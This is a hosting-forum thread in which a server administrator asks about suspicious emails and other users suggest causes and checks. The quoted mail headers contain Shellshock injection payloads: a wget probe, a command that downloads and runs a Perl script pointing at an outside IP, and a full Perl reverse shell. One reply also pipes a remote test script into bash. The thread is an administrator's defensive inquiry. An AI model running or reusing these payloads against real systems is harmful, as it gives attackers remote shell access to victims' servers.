• If you are still using CentOS 7.9, it's time to convert to Alma 8 with the free centos2alma tool by Plesk or Plesk Migrator. Please let us know your experiences or concerns in this thread:
    CentOS2Alma discussion

Some strange e-mails from Server - hack attempt?

F

ffischer

Basic Pleskian
Hi,
today i got some e-mails from my server
Dont know what this can be,
i searched the whole Server but nothing found.

this are te messages in the Mails:

Mail 1:

Code: 
Delivered-To: [email protected]
Received: from USER (u16850951.onlinehome-server.com [74.208.184.251])
    by freaky-media.de (Postfix) with ESMTP id D02C4621410
    for <root>; Fri, 24 Oct 2014 11:25:36 +0200 (CAT)
To: () { :; }; wget 185.10.58.181/VULNERABLE;
References: () { :; }; wget 185.10.58.181/VULNERABLE;
Cc: () { :; }; wget 185.10.58.181/VULNERABLE;
From: () { :; }; wget 185.10.58.181/VULNERABLE;
Subject: () { :; }; wget 185.10.58.181/VULNERABLE;
Date: () { :; }; wget 185.10.58.181/VULNERABLE;
Message-ID: () { :; }; wget 185.10.58.181/VULNERABLE;
Comments: () { :; }; wget 185.10.58.181/VULNERABLE;
Keywords: () { :; }; wget 185.10.58.181/VULNERABLE;
Resent-Date: () { :; }; wget 185.10.58.181/VULNERABLE;
Resent-From: () { :; }; wget 185.10.58.181/VULNERABLE;


Mail 2:
Code: 
Return-Path: <[email protected]>
X-Original-To: root@localhost
Delivered-To: [email protected]
Received: by freaky-media.de (Postfix)
    id 73690621464; Fri, 24 Oct 2014 11:59:34 +0200 (CAT)
Delivered-To: root@localhost
Received: from USER (u16850951.onlinehome-server.com [74.208.184.251])
    by freaky-media.de (Postfix) with SMTP id 0A054621410
    for <root@localhost>; Fri, 24 Oct 2014 11:59:33 +0200 (CAT)
To: () { :; }; wget 91.184.21.251/e.txt;perl e.txt 185.10.58.181 443;
References: () { :; }; wget 91.184.21.251/e.txt;perl e.txt 185.10.58.181 443;
Cc: () { :; }; wget 91.184.21.251/e.txt;perl e.txt 185.10.58.181 443;
From: () { :; }; wget 91.184.21.251/e.txt;perl e.txt 185.10.58.181 443;
Subject: () { :; }; wget 91.184.21.251/e.txt;perl e.txt 185.10.58.181 443;
Date: () { :; }; wget 91.184.21.251/e.txt;perl e.txt 185.10.58.181 443;
Message-ID: () { :; }; wget 91.184.21.251/e.txt;perl e.txt 185.10.58.181 443;
Comments: () { :; }; wget 91.184.21.251/e.txt;perl e.txt 185.10.58.181 443;
Keywords: () { :; }; wget 91.184.21.251/e.txt;perl e.txt 185.10.58.181 443;
Resent-Date: () { :; }; wget 91.184.21.251/e.txt;perl e.txt 185.10.58.181 443;
Resent-From: () { :; }; wget 91.184.21.251/e.txt;perl e.txt 185.10.58.181 443;

Mail 3:
Code: 
Return-Path: <[email protected]>
X-Original-To: root@localhost
Delivered-To: [email protected]
Received: by freaky-media.de (Postfix)
    id 06940621468; Fri, 24 Oct 2014 12:36:43 +0200 (CAT)
Delivered-To: root@localhost
Received: from USER (u16850951.onlinehome-server.com [74.208.184.251])
    by freaky-media.de (Postfix) with SMTP id 806DD621467
    for <root@localhost>; Fri, 24 Oct 2014 12:36:42 +0200 (CAT)
To: () { :; }; perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(25,inet_aton("185.10.58.181")))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';
References: () { :; }; perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(25,inet_aton("185.10.58.181")))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';
Cc: () { :; }; perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(25,inet_aton("185.10.58.181")))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';
From: () { :; }; perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(25,inet_aton("185.10.58.181")))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';
Subject: () { :; }; perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(25,inet_aton("185.10.58.181")))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';
Date: () { :; }; perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(25,inet_aton("185.10.58.181")))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';
Message-ID: () { :; }; perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(25,inet_aton("185.10.58.181")))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';
Comments: () { :; }; perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(25,inet_aton("185.10.58.181")))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';
Keywords: () { :; }; perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(25,inet_aton("185.10.58.181")))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';
Resent-Date: () { :; }; perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(25,inet_aton("185.10.58.181")))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';
Resent-From: () { :; }; perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(25,inet_aton("185.10.58.181")))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';

Some one any ideas?

best regards
Frank
 
maybe someone tryed out to get in with shellshock Bug
a test direct in shell gives me:

Code: 
root@freaky-media:~# curl https://shellshocker.net/shellshock_test.sh | bash
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  2627  100  2627    0     0   4243      0 --:--:-- --:--:-- --:--:--  4250
CVE-2014-6271 (original shellshock): not vulnerable
CVE-2014-6277 (segfault): not vulnerable
CVE-2014-6278 (Florian's patch): not vulnerable
CVE-2014-7169 (taviso bug): not vulnerable
CVE-2014-7186 (redir_stack bug): not vulnerable
CVE-2014-7187 (nested loops off by one): not vulnerable
CVE-2014-//// (exploit 3 on http://shellshocker.net/): not vulnerable


So the code above does not working :)
 
Are you using "Joomla" or "Mambo" on your server and probably have extensions using the exploit "mosConfig_absolute_path" ? With this exploit it is possible to add additional remote files within a link, like shown in your quotes from Mail no. 2.
To prevent that this exploit might work, please turn on modsecurity and still consider removing the source or the complete extension from your server. Make sure to use only sources and extensions from official servers, because they mostly check sources and extensions before they release them. Sometimes theme templates have as well security holes or exploits, so it is wise to check the code, before using it.
 
Yes, some Domains has Joomla on it.
The ModSecurity on Plesk Server is ON, ist was activated before the hack was starting.

I searched the whole Server about files that has "e.txt;perl" in it,
but actually i only found the Mails that contains this Text.
 
Hi ffischer,

you might have missunderstood something here.... the remote file might be, or might not be on YOUR server. Please check the corresponding articles to that exploit, using Google and Co. for a search.
 
You must log in or register to reply here.

Similar threads

Caspar
Issue changing e-mail will result in ch_admin_email: Cannot change admin email for web server.
Replies
7
Views
915
Caspar
Caspar
E
Plesk 8.6 Ubuntu LTS 8.04 LTS server hacked by HEXBOOT3R exploited www-data and /tmp
Replies
0
Views
3K
eugenevdm
E
Back
Top